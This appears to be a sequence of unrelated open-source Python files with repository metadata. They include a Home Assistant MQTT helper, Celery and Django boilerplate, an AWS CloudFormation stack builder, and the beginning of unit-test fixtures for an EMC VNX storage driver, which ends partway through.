raise HomeAssistantError('Error talking to MQTT: {}'.format(result))
def _match_topic(subscription, topic):
""" Returns if topic matches subscription. """
if subscription.endswith('#'):
return (subscription[:-2] == topic or
topic.startswith(subscription[:-1]))
sub_parts = subscription.split('/')
topic_parts = topic.split('/')
return (len(sub_parts) == len(topic_parts) and
all(a == b for a, b in zip(sub_parts, topic_parts) if a != '+'))
|
badele/home-assistant
|
homeassistant/components/mqtt/__init__.py
|
Python
|
mit
| 9,508 | 0 |
"""
Empty
"""
|
fallisd/validate
|
unittests/__init__.py
|
Python
|
gpl-2.0
| 14 | 0 |
from __future__ import absolute_import
from celery import shared_task
import praw
from .commonTasks import *
from .models import Redditor, RedditorStatus, Status
@shared_task
def test(param):
return 'The test task executed with argument "%s" ' % param
@shared_task
def update_user(redditor):
update_user_status(redditor, 10)
get_submissions(redditor)
update_user_status(redditor, 20)
get_comments(redditor)
update_user_status(redditor, 30)
@shared_task
def write_user(user):
create_user(user)
|
a-harper/RedditorProfiler
|
tasks.py
|
Python
|
gpl-3.0
| 532 | 0.00188 |
"""
WSGI config for spendrbackend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spendrbackend.settings")
application = get_wsgi_application()
|
sawmurai/spendrbackend
|
spendrbackend/wsgi.py
|
Python
|
apache-2.0
| 404 | 0 |
import os
import sys
path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0, path)
|
phha/taskwiki
|
tests/__init__.py
|
Python
|
mit
| 115 | 0 |
# Created By: Virgil Dupras
# Created On: 2010-02-05
# Copyright 2015 Hardcoded Software (http://www.hardcoded.net)
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog
from .details_table import DetailsModel
class DetailsDialog(QDialog):
def __init__(self, parent, app, **kwargs):
super().__init__(parent, Qt.Tool, **kwargs)
self.app = app
self.model = app.model.details_panel
self._setupUi()
# To avoid saving uninitialized geometry on appWillSavePrefs, we track whether our dialog
# has been shown. If it has, we know that our geometry should be saved.
self._shown_once = False
self.app.prefs.restoreGeometry('DetailsWindowRect', self)
self.tableModel = DetailsModel(self.model)
# tableView is defined in subclasses
self.tableView.setModel(self.tableModel)
self.model.view = self
self.app.willSavePrefs.connect(self.appWillSavePrefs)
def _setupUi(self): # Virtual
pass
def show(self):
self._shown_once = True
super().show()
#--- Events
def appWillSavePrefs(self):
if self._shown_once:
self.app.prefs.saveGeometry('DetailsWindowRect', self)
#--- model --> view
def refresh(self):
self.tableModel.beginResetModel()
self.tableModel.endResetModel()
|
stuckj/dupeguru
|
qt/base/details_dialog.py
|
Python
|
gpl-3.0
| 1,600 | 0.00875 |
#!/usr/bin/env python
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
call_command(
'dumpdata',
"waffle.flag",
indent=4,
use_natural_foreign_keys=True,
use_natural_primary_keys=True,
output='base/fixtures/waffle_flags.json'
)
|
uclouvain/OSIS-Louvain
|
base/management/commands/dump_waffle_flags.py
|
Python
|
agpl-3.0
| 436 | 0 |
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
|
warriorframework/warriorframework
|
warrior/WarriorCore/__init__.py
|
Python
|
apache-2.0
| 581 | 0.001721 |
from pprint import pprint
from amazon_cf import Environment
from amazon_client import Cloudformation
from helper import (
Listener,
SecurityGroupRules,
UserPolicy,
get_my_ip,
get_local_variables,
convert_to_aws_list,
ContainerDefinition
)
if __name__ == "__main__":
# Manually created items and constants
key_name = 'id_rsa'
filename = 'file.json'
stack_name = 'dev'
server_size = "t2.micro"
ami = "ami-64385917"
app_container = "martyni/app"
nginx_container = "martyni/nginx"
domain = "martyni.co.uk."
ssl_cert = "arn:aws:acm:eu-west-1:526914317097:certificate/c162e6f8-3f40-4468-a03f-03f5c8d8ee63"
container_size = 450
environment_variables = [
"AWS_DEFAULT_PROFILE",
"MAIL_USERNAME",
"MAIL_PASSWORD",
"MAIL_DEFAULT_SENDER",
"MAIL_SERVER",
"MAIL_PORT",
"MAIL_USE_SSL"
]
# Container configuration
app_container = {
"Name": "app",
"Image": app_container,
"Cpu": container_size,
"Memory": container_size,
"Environment": get_local_variables(environment_variables),
"Essential": True
}
nginx_container = {
"Name": "nginx",
"Image": nginx_container,
"Cpu": container_size,
"PortMappings": [
{
"Protocol": "tcp",
"ContainerPort": 80,
"HostPort": 80
}
],
"Memory": container_size,
"Environment": convert_to_aws_list(SITE=stack_name + "." + domain[:-1:]),
"Links": ["app"],
"Essential": True
}
# Healthcheck config
healthcheck = {
"HealthyThreshold": 2,
"Interval": 10,
"Target": "HTTP:80/",
"Timeout": 5,
"UnhealthyThreshold": 10
}
my_ip = get_my_ip()
my_env = Environment('my_env')
my_env.add_vpc("VPC")
my_env.add_subnet("My first subnet", AvailabilityZone={
"Fn::Select": ["1", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_subnet("My second subnet", AvailabilityZone={
"Fn::Select": ["2", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_subnet("My third subnet", AvailabilityZone={
"Fn::Select": ["0", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_internet_gateway("internet gateway")
my_env.attach_internet_gateway("Attach gateway")
my_env.add_route_table("My default route table")
my_env.add_default_internet_route("To the internet")
my_env.add_subnet_to_route_table("add first subnet")
my_env.add_subnet_to_route_table(
"add second subnet", subnet="MySecondSubnet")
my_env.add_subnet_to_route_table(
"add third subnet", subnet="MyThirdSubnet")
in_rules = SecurityGroupRules("SecurityGroupIngress")
in_rules.add_rule("tcp", from_port=22, to_port=22, cidr_ip=my_ip)
in_rules.add_rule("tcp", from_port=443, to_port=443, cidr_ip="0.0.0.0/0",)
in_rules.add_rule("tcp", from_port=80, to_port=80, cidr_ip="0.0.0.0/0",)
out_rules = SecurityGroupRules("SecurityGroupEgress")
out_rules.add_rule("-1", cidr_ip="0.0.0.0/0")
my_env.add_security_group(
"My security group", in_rules.rules, out_rules.rules)
docker_user = UserPolicy("docker")
docker_user.add_statement([
"ecr:*",
"ecs:CreateCluster",
"ecs:DeregisterContainerInstance",
"ecs:DiscoverPollEndpoint",
"ecs:Poll",
"ecs:RegisterContainerInstance",
"ecs:StartTelemetrySession",
"ecs:Submit*",
"logs:CreateLogStream",
"logs:PutLogEvents"
])
my_env.add_role(stack_name + "role", Policies=docker_user.policies)
my_env.add_instance_profile("My profile")
my_env.add_launch_configuration(
"my launch configuration",
ami,
server_size,
KeyName=key_name,
AssociatePublicIpAddress=True,
IamInstanceProfile=my_env.cf_ref("MyProfile")
)
l_443 = Listener(
443,
80,
lb_protocol="HTTPS",
inst_protocol="HTTP",
ssl_certificate_id=ssl_cert
)
my_env.add_loadbalancer(
"My Load Balancer",
[l_443.get_listener()],
HealthCheck=healthcheck)
my_env.add_autoscaling_group("My Autoscaling Group", DesiredCapacity="1", LoadBalancerNames=[
my_env.cf_ref("MyLoadBalancer")])
app_container = ContainerDefinition(**app_container)
nginx_container = ContainerDefinition(**nginx_container)
my_env.add_ecs_task('web service',
container_definitions=[
app_container.return_container(),
nginx_container.return_container()
]
)
my_env.add_ecs_service('web service running')
resource_record = [my_env.cf_get_at("MyLoadBalancer", "DNSName")]
my_env.add_record_set(
stack_name + "." + domain,
_type="CNAME",
depends=["MyLoadBalancer"],
HostedZoneName=domain,
TTL="300",
ResourceRecords=resource_record
)
# Launch stack
pprint(my_env.show_resources())
my_env.write_resources(filename)
my_client = Cloudformation(stack_name, filename)
my_client.create_stack()
|
martyni/amazon
|
my_env.py
|
Python
|
mit
| 5,433 | 0.001104 |
from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
from finance.models import Payment
from .models import BookingVehicle
@receiver([post_save, post_delete], sender=Payment)
def update_booking_payment_info(sender, instance, **kwargs):
if instance.item_content_type.app_label == 'opencabs' and \
instance.item_content_type.model == 'booking':
if instance.item_object:
instance.item_object.save()
@receiver([post_save, post_delete], sender=BookingVehicle)
def update_booking_drivers(sender, instance, **kwargs):
instance.booking.update_drivers()
|
rtnpro/opencabs
|
opencabs/signals.py
|
Python
|
gpl-3.0
| 635 | 0 |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
class QualityMeeting(Document):
pass
|
Zlash65/erpnext
|
erpnext/quality_management/doctype/quality_meeting/quality_meeting.py
|
Python
|
gpl-3.0
| 242 | 0.012397 |
# Copyright (c) 2012 - 2014 EMC Corporation, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import mock
from oslo_concurrency import processutils
from cinder import exception
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.emc.emc_cli_fc import EMCCLIFCDriver
from cinder.volume.drivers.emc.emc_cli_iscsi import EMCCLIISCSIDriver
import cinder.volume.drivers.emc.emc_vnx_cli as emc_vnx_cli
from cinder.volume.drivers.emc.emc_vnx_cli import CommandLineHelper
from cinder.volume.drivers.emc.emc_vnx_cli import EMCVnxCLICmdError
from cinder.volume import volume_types
from cinder.zonemanager.fc_san_lookup_service import FCSanLookupService
SUCCEED = ("", 0)
FAKE_ERROR_RETURN = ("FAKE ERROR", 255)
class EMCVNXCLIDriverTestData():
test_volume = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_clone_cg = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_cg = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': 'cg_id',
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_rw = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'attached_mode', 'value': 'rw'},
{'key': 'readonly', 'value': 'False'}]
}
test_volume2 = {
'name': 'vol2',
'size': 1,
'volume_name': 'vol2',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol2',
'consistencygroup_id': None,
'display_description': 'test volume',
'volume_type_id': None}
volume_in_cg = {
'name': 'vol2',
'size': 1,
'volume_name': 'vol2',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol2',
'consistencygroup_id': None,
'display_description': 'test volume',
'volume_type_id': None}
test_volume_with_type = {
'name': 'vol_with_type',
'size': 1,
'volume_name': 'vol_with_type',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'thin_vol',
'consistencygroup_id': None,
'display_description': 'vol with type',
'volume_type_id': 'abc1-2320-9013-8813-8941-1374-8112-1231'}
test_failed_volume = {
'name': 'failed_vol1',
'size': 1,
'volume_name': 'failed_vol1',
'id': '4',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed_vol',
'consistencygroup_id': None,
'display_description': 'test failed volume',
'volume_type_id': None}
test_snapshot = {
'name': 'snapshot1',
'size': 1,
'id': '4444',
'volume_name': 'vol1',
'volume_size': 1,
'consistencygroup_id': None,
'cgsnapshot_id': None,
'project_id': 'project'}
test_failed_snapshot = {
'name': 'failed_snapshot',
'size': 1,
'id': '5555',
'volume_name': 'vol-vol1',
'volume_size': 1,
'project_id': 'project'}
test_clone = {
'name': 'clone1',
'size': 1,
'id': '2',
'volume_name': 'vol1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'clone1',
'consistencygroup_id': None,
'display_description': 'volume created from snapshot',
'volume_type_id': None}
test_clone_cg = {
'name': 'clone1',
'size': 1,
'id': '2',
'volume_name': 'vol1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'clone1',
'consistencygroup_id': 'consistencygroup_id',
'display_description': 'volume created from snapshot',
'volume_type_id': None}
connector = {
'ip': '10.0.0.2',
'initiator': 'iqn.1993-08.org.debian:01:222',
'wwpns': ["1234567890123456", "1234567890543216"],
'wwnns': ["2234567890123456", "2234567890543216"],
'host': 'fakehost'}
test_volume3 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce24',
'name': 'vol3',
'size': 2,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location': None,
'host': 'ubuntu-server12@pool_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test02', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'attached_host': None,
'_name_id': None, 'volume_metadata': []}
test_new_type = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning': 'thin'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
test_diff = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provisioning': ('thick', 'thin')}}
test_host = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'POOL_SAS1|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
test_volume4 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce24',
'name': 'vol4',
'size': 2L,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location': None,
'host': 'ubuntu-server12@array_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test02', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'_name_id': None, 'volume_metadata': []}
test_volume5 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce25',
'name_id': '1181d1b2-cea3-4f55-8fa8-3360d026ce25',
'name': 'vol5',
'size': 1,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location':
'system^FNM11111|type^lun|lun_id^5',
'host': 'ubuntu-server12@array_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test05', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'_name_id': None, 'volume_metadata': []}
test_new_type2 = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:pool': 'POOL_SAS2'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
test_diff2 = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:pool': ('POOL_SAS1', 'POOL_SAS2')}}
test_host2 = {'host': 'ubuntu-server12@array_backend_1',
'capabilities':
{'location_info': '|FNM00124500890',
'volume_backend_name': 'array_backend_1',
'storage_protocol': 'iSCSI'}}
test_cg = {'id': 'consistencygroup_id',
'name': 'group_name',
'status': 'deleting'}
test_cgsnapshot = {
'consistencygroup_id': 'consistencygroup_id',
'id': 'cgsnapshot_id',
'status': 'available'}
test_member_cgsnapshot = {
'name': 'snapshot1',
'size': 1,
'id': 'cgsnapshot_id',
'volume_name': 'vol1',
'volume_size': 1,
'consistencygroup_id': 'consistencygroup_id',
'cgsnapshot_id': 'cgsnapshot_id',
'project_id': 'project'
}
test_lun_id = 1
test_existing_ref = {'id': test_lun_id}
test_pool_name = 'Pool_02_SASFLASH'
device_map = {
'1122334455667788': {
'initiator_port_wwn_list': ['123456789012345', '123456789054321'],
'target_port_wwn_list': ['1122334455667777']}}
i_t_map = {'123456789012345': ['1122334455667777'],
'123456789054321': ['1122334455667777']}
POOL_PROPERTY_CMD = ('storagepool', '-list', '-name', 'unit_test_pool',
'-userCap', '-availableCap')
NDU_LIST_CMD = ('ndu', '-list')
NDU_LIST_RESULT = ("Name of the software package: -Compression " +
"Name of the software package: -Deduplication " +
"Name of the software package: -FAST " +
"Name of the software package: -FASTCache " +
"Name of the software package: -ThinProvisioning ",
0)
def SNAP_MP_CREATE_CMD(self, name='vol1', source='vol1'):
return ('lun', '-create', '-type', 'snap', '-primaryLunName',
source, '-name', name)
def SNAP_ATTACH_CMD(self, name='vol1', snapName='snapshot1'):
return ('lun', '-attach', '-name', name, '-snapName', snapName)
def SNAP_DELETE_CMD(self, name):
return ('snap', '-destroy', '-id', name, '-o')
def SNAP_CREATE_CMD(self, name):
return ('snap', '-create', '-res', 1, '-name', name,
'-allowReadWrite', 'yes',
'-allowAutoDelete', 'no')
def LUN_DELETE_CMD(self, name):
return ('lun', '-destroy', '-name', name, '-forceDetach', '-o')
def LUN_CREATE_CMD(self, name, isthin=False):
return ('lun', '-create', '-type', 'Thin' if isthin else 'NonThin',
'-capacity', 1, '-sq', 'gb', '-poolName',
'unit_test_pool', '-name', name)
def LUN_EXTEND_CMD(self, name, newsize):
return ('lun', '-expand', '-name', name, '-capacity', newsize,
'-sq', 'gb', '-o', '-ignoreThresholds')
def LUN_PROPERTY_ALL_CMD(self, lunname):
return ('lun', '-list', '-name', lunname,
'-state', '-status', '-opDetails', '-userCap', '-owner',
'-attachedSnapshot')
def MIGRATION_CMD(self, src_id=1, dest_id=1):
return ("migrate", "-start", "-source", src_id, "-dest", dest_id,
"-rate", "high", "-o")
def MIGRATION_VERIFY_CMD(self, src_id):
return ("migrate", "-list", "-source", src_id)
def GETPORT_CMD(self):
return ("connection", "-getport", "-address", "-vlanid")
def PINGNODE_CMD(self, sp, portid, vportid, ip):
return ("connection", "-pingnode", "-sp", sp, '-portid', portid,
"-vportid", vportid, "-address", ip)
def GETFCPORT_CMD(self):
return ('port', '-list', '-sp')
def CONNECTHOST_CMD(self, hostname, gname):
return ('storagegroup', '-connecthost',
'-host', hostname, '-gname', gname, '-o')
def ENABLE_COMPRESSION_CMD(self, lun_id):
return ('compression', '-on',
'-l', lun_id, '-ignoreThresholds', '-o')
provisioning_values = {
'thin': ['-type', 'Thin'],
'thick': ['-type', 'NonThin'],
'compressed': ['-type', 'Thin'],
'deduplicated': ['-type', 'Thin', '-deduplication', 'on']}
tiering_values = {
'starthighthenauto': [
'-initialTier', 'highestAvailable',
'-tieringPolicy', 'autoTier'],
'auto': [
'-initialTier', 'optimizePool',
'-tieringPolicy', 'autoTier'],
'highestavailable': [
'-initialTier', 'highestAvailable',
'-tieringPolicy', 'highestAvailable'],
'lowestavailable': [
'-initialTier', 'lowestAvailable',
'-tieringPolicy', 'lowestAvailable'],
'nomovement': [
'-initialTier', 'optimizePool',
'-tieringPolicy', 'noMovement']}
def LUN_CREATION_CMD(self, name, size, pool, provisioning, tiering):
initial = ['lun', '-create',
'-capacity', size,
'-sq', 'gb',
'-poolName', pool,
'-name', name]
if provisioning:
initial.extend(self.provisioning_values[provisioning])
else:
initial.extend(self.provisioning_values['thick'])
if tiering:
initial.extend(self.tiering_values[tiering])
return tuple(initial)
def CHECK_FASTCACHE_CMD(self, storage_pool):
return ('-np', 'storagepool', '-list', '-name',
storage_pool, '-fastcache')
def CREATE_CONSISTENCYGROUP_CMD(self, cg_name):
return ('-np', 'snap', '-group', '-create',
'-name', cg_name, '-allowSnapAutoDelete', 'no')
def DELETE_CONSISTENCYGROUP_CMD(self, cg_name):
return ('-np', 'snap', '-group', '-destroy',
'-id', cg_name)
def GET_CONSISTENCYGROUP_BY_NAME(self, cg_name):
return ('snap', '-group', '-list', '-id', cg_name)
def ADD_LUN_TO_CG_CMD(self, cg_name, lun_id):
return ('-np', 'snap', '-group',
'-addmember', '-id', cg_name, '-res', lun_id)
def CREATE_CG_SNAPSHOT(self, cg_name, snap_name):
return ('-np', 'snap', '-create', '-res', cg_name,
'-resType', 'CG', '-name', snap_name, '-allowReadWrite',
'yes', '-allowAutoDelete', 'no')
def DELETE_CG_SNAPSHOT(self, snap_name):
return ('-np', 'snap', '-destroy', '-id', snap_name, '-o')
def GET_CG_BY_NAME_CMD(self, cg_name):
return ('snap', '-group', '-list', '-id', cg_name)
def CONSISTENCY_GROUP_VOLUMES(self):
volumes = []
volumes.append(self.test_volume)
volumes.append(self.test_volume)
return volumes
def SNAPS_IN_SNAP_GROUP(self):
snaps = []
snaps.append(self.test_snapshot)
snaps.append(self.test_snapshot)
return snaps
def CG_PROPERTY(self, cg_name):
return """
Name: %(cg_name)s
Description:
Allow auto delete: No
Member LUN ID(s): 1, 3
State: Ready
""" % {'cg_name': cg_name}
POOL_PROPERTY = ("""\
Pool Name: unit_test_pool
Pool ID: 1
User Capacity (Blocks): 5769501696
User Capacity (GBs): 10000.5
Available Capacity (Blocks): 5676521472
Available Capacity (GBs): 1000.6
""", 0)
ALL_PORTS = ("SP: A\n" +
"Port ID: 4\n" +
"Port WWN: iqn.1992-04.com.emc:cx.fnm00124000215.a4\n" +
"iSCSI Alias: 0215.a4\n\n" +
"Virtual Port ID: 0\n" +
"VLAN ID: Disabled\n" +
"IP Address: 10.244.214.118\n\n" +
"SP: A\n" +
"Port ID: 5\n" +
"Port WWN: iqn.1992-04.com.emc:cx.fnm00124000215.a5\n" +
"iSCSI Alias: 0215.a5\n", 0)
iscsi_connection_info_ro = \
{'data': {'access_mode': 'ro',
'target_discovered': True,
'target_iqn':
'iqn.1992-04.com.emc:cx.fnm00124000215.a4',
'target_lun': 1,
'target_portal': '10.244.214.118:3260'},
'driver_volume_type': 'iscsi'}
iscsi_connection_info_rw = \
{'data': {'access_mode': 'rw',
'target_discovered': True,
'target_iqn':
'iqn.1992-04.com.emc:cx.fnm00124000215.a4',
'target_lun': 1,
'target_portal': '10.244.214.118:3260'},
'driver_volume_type': 'iscsi'}
PING_OK = ("Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n", 0)
FC_PORTS = ("Information about each SPPORT:\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 0\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:60:08:60:01:95\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: YES\n" +
"Switch UID: 10:00:00:05:1E:72:EC:A6:" +
"20:46:00:05:1E:72:EC:A6\n" +
"SP Source ID: 272896\n" +
"\n" +
"SP Name: SP B\n" +
"SP Port ID: 4\n" +
"SP UID: iqn.1992-04.com.emc:cx." +
"fnm00124000215.b4\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: Not Applicable\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 2\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:62:08:60:01:95\n" +
"Link Status: Down\n" +
"Port Status: Online\n" +
"Switch Present: NO\n", 0)
FAKEHOST_PORTS = (
"Information about each HBA:\n" +
"\n" +
"HBA UID: 20:00:00:90:FA:53:46:41:12:34:" +
"56:78:90:12:34:56\n" +
"Server Name: fakehost\n" +
"Server IP Address: 10.0.0.2" +
"HBA Model Description:\n" +
"HBA Vendor Description:\n" +
"HBA Device Driver Name:\n" +
"Information about each port of this HBA:\n\n" +
" SP Name: SP A\n" +
" SP Port ID: 0\n" +
" HBA Devicename:\n" +
" Trusted: NO\n" +
" Logged In: YES\n" +
" Defined: YES\n" +
" Initiator Type: 3\n" +
" StorageGroup Name: fakehost\n\n" +
" SP Name: SP A\n" +
" SP Port ID: 2\n" +
" HBA Devicename:\n" +
" Trusted: NO\n" +
" Logged In: YES\n" +
" Defined: YES\n" +
" Initiator Type: 3\n" +
" StorageGroup Name: fakehost\n\n" +
"Information about each SPPORT:\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 0\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:60:08:60:01:95\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: YES\n" +
"Switch UID: 10:00:00:05:1E:72:EC:A6:" +
"20:46:00:05:1E:72:EC:A6\n" +
"SP Source ID: 272896\n" +
"\n" +
"SP Name: SP B\n" +
"SP Port ID: 4\n" +
"SP UID: iqn.1992-04.com.emc:cx." +
"fnm00124000215.b4\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: Not Applicable\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 2\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:62:08:60:01:95\n" +
"Link Status: Down\n" +
"Port Status: Online\n" +
"Switch Present: NO\n", 0)
def LUN_PROPERTY(self, name, isThin=False, hasSnap=False, size=1):
return """\
LOGICAL UNIT NUMBER 1
Name: %s
UID: 60:06:01:60:09:20:32:00:13:DF:B4:EF:C2:63:E3:11
Current Owner: SP A
Default Owner: SP A
Allocation Owner: SP A
Attached Snapshot: %s
User Capacity (Blocks): 2101346304
User Capacity (GBs): %d
Consumed Capacity (Blocks): 2149576704
Consumed Capacity (GBs): 1024.998
Pool Name: Pool_02_SASFLASH
Current State: Ready
Status: OK(0x0)
Is Faulted: false
Is Transitioning: false
Current Operation: None
Current Operation State: N/A
Current Operation Status: N/A
Current Operation Percent Completed: 0
Is Thin LUN: %s""" % (name,
'FakeSnap' if hasSnap else 'N/A',
size,
'Yes' if isThin else 'No'), 0
def STORAGE_GROUP_NO_MAP(self, sgname):
return ("""\
Storage Group Name: %s
Storage Group UID: 27:D2:BE:C1:9B:A2:E3:11:9A:8D:FF:E5:3A:03:FD:6D
Shareable: YES""" % sgname, 0)
def STORAGE_GROUP_HAS_MAP(self, sgname):
return ("""\
Storage Group Name: %s
Storage Group UID: 54:46:57:0F:15:A2:E3:11:9A:8D:FF:E5:3A:03:FD:6D
HBA/SP Pairs:
HBA UID SP Name SPPort
------- ------- ------
iqn.1993-08.org.debian:01:222 SP A 4
HLU/ALU Pairs:
HLU Number ALU Number
---------- ----------
1 1
Shareable: YES""" % sgname, 0)
class EMCVNXCLIDriverISCSITestCase(test.TestCase):
def setUp(self):
super(EMCVNXCLIDriverISCSITestCase, self).setUp()
self.stubs.Set(CommandLineHelper, 'command_execute',
self.succeed_fake_command_execute)
self.stubs.Set(CommandLineHelper, 'get_array_serial',
mock.Mock(return_value={'array_serial':
'fakeSerial'}))
self.stubs.Set(os.path, 'exists', mock.Mock(return_value=1))
self.stubs.Set(emc_vnx_cli, 'INTERVAL_5_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_30_SEC', 0.01)
self.stubs.Set(emc_vnx_cli, 'INTERVAL_60_SEC', 0.01)
self.configuration = conf.Configuration(None)
self.configuration.append_config_values = mock.Mock(return_value=0)
self.configuration.naviseccli_path = '/opt/Navisphere/bin/naviseccli'
self.configuration.san_ip = '10.0.0.1'
self.configuration.storage_vnx_pool_name = 'unit_test_pool'
self.configuration.san_login = 'sysadmin'
self.configuration.san_password = 'sysadmin'
#set the timeout to 0.012s = 0.0002 * 60 = 1.2ms
self.configuration.default_timeout = 0.0002
self.configuration.initiator_auto_registration = True
self.stubs.Set(self.configuration, 'safe_get', self.fake_safe_get)
self.testData = EMCVNXCLIDriverTestData()
self.navisecclicmd = '/opt/Navisphere/bin/naviseccli ' + \
'-address 10.0.0.1 -user sysadmin -password sysadmin -scope 0 '
self.configuration.iscsi_initiators = '{"fakehost": ["10.0.0.2"]}'
def tearDown(self):
super(EMCVNXCLIDriverISCSITestCase, self).tearDown()
def driverSetup(self, commands=tuple(), results=tuple()):
self.driver = EMCCLIISCSIDriver(configuration=self.configuration)
fake_command_execute = self.get_command_execute_simulator(
commands, results)
fake_cli = mock.Mock(side_effect=fake_command_execute)
self.driver.cli._client.command_execute = fake_cli
return fake_cli
def get_command_execute_simulator(self, commands=tuple(),
results=tuple()):
assert(len(commands) == len(results))
def fake_command_execute(*args, **kwargv):
for i in range(len(commands)):
if args == commands[i]:
if isinstance(results[i], list):
if len(results[i]) > 0:
ret = results[i][0]
del results[i][0]
return ret
else:
return results[i]
return self.standard_fake_command_execute(*args, **kwargv)
return fake_command_execute
def standard_fake_command_execute(self, *args, **kwargv):
standard_commands = [
self.testData.LUN_PROPERTY_ALL_CMD('vol1'),
self.testData.LUN_PROPERTY_ALL_CMD('vol2'),
